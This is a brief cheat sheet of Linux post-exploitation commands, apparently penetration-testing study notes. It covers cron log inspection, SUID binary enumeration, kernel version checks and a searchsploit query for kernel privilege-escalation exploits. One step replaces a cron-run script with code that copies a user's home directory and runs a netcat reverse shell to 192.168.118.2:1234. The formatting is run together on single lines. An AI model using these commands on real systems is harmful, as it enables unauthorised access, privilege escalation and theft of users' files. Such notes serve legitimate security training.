Linux post exploitation

cat /var/log/cron.log grep "CRON" /var/log/syslog # inspects cronlog file which can reveal locations of scripts. # replace the script with: #!/bin/bash cp -rf /home/joe/ /var/backups/joe/ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f"

find / -perm -u=s -type f 2>/dev/null # find files with SUID bit, odd ones can be leveraged for privesc with GTFOBins

cat /etc/issue # shows OS info uname -r # kerel arch # architecture searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8" # Searches for kernel exploits